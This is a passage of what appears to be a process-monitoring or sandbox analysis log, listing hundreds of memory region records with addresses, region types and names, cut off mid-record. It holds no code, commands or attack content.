Region: id = 11033 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11034 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11035 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11036 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11037 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11038 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11039 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11040 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11041 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11042 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11043 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11044 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11045 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11046 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11047 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11048 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11049 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11050 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11051 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11052 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11053 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11054 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11055 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11056 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11057 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11058 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11059 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11060 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11061 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11062 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11063 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11064 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11065 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11066 start_va = 0x7c60000 end_va = 0x7d59fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 11067 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11068 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11069 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11070 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11071 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11072 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11073 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11074 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11075 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11076 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11077 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11078 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11079 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11080 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11081 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11082 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11083 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11084 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11085 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11086 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11087 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11088 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11089 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11090 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11091 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11092 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11093 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11094 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11095 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11096 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11097 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11098 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11099 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11100 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11101 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11102 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11103 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11104 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11105 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11106 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11107 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11108 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11109 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11110 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11111 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11112 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11113 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11114 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11115 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11116 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11117 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11118 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11119 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11120 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11121 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11122 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11123 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11124 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11125 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11126 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11127 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11128 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11129 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11130 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11131 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11132 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11133 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11134 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11135 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11136 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11137 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11138 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11141 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11142 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11144 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11145 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11146 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11148 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11149 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11150 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11152 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11153 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11154 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11157 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11158 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11161 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11162 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11165 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11166 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11169 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11170 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11172 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11173 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11174 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11177 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11178 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11180 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11181 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11182 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11184 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11186 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11187 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11188 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11191 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11192 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11195 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11196 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11199 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11200 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11201 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11203 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11204 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11205 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11206 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11207 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11208 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11209 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11211 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11212 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11213 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11215 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11216 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11217 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11219 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11220 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11221 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11223 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11224 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11225 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11227 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11228 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11229 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11231 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = 